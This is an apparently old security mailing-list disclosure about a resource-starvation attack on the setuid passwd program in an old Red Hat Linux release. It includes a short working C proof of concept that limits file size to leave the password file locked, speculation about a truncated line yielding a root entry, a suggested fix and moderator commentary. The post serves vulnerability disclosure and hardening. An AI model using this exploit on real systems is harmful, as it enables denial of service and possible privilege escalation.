Standard apology if old...
This demonstrates a resource starvation attack on the
setuid root passwd(1) program. In the case I tested it was the
Red Hat Linux passwd-0.50-7 program without shadowing.
#include <stdio.h>
#include <sys/time.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/resource.h>
main ()
{
struct rlimit rl, *rlp;
rlp=&rl;
rlp->rlim_cur=4000 ;
rlp->rlim_max=4000 ;
setrlimit(RLIMIT_FSIZE, rlp);
execl("/usr/bin/passwd", "passwd", (char *) 0);
}
The resource being restricted is filesize, and if the passwd file is
large enough it cannot be written back and the passwd program dies.
This leaves the passwd file locked against further password changes -
a denial of service attack.
I was unable to write back an incomplete passwd file during my tests,
but I can imagine some systems allowing this, in which case you could
aim for an incomplete last line like this
myname:my-epw:
which could be awkward if any authentication programs interpret it as
myname:my-epw:0:0::/:/bin/sh
A suggested fix is for the passwd program to be aware of the size of
the file before writing, and to quit if failure is predicted.
There are obviously other resources that could be restricted, and there
may be a case for increasing limits on cpu time or file descriptors,
or even filesize to ensure successful completion.
[mod: setuid programs like "passwd" should have a paranoid attitude.
This includes exiting on any error. The "error exit" path should
clean up, including releasing the lock. I don''t think setuid programs
should try to sanitize their environment: that will make them more
complex and error-prone. Moreover it won''t help. The disk could be
full after writing the tempfile halfway. -- REW]
--
##############################################################
# Antonomasia ant@notatla.demon.co.uk #
# See http://www.notatla.demon.co.uk/ #
##############################################################
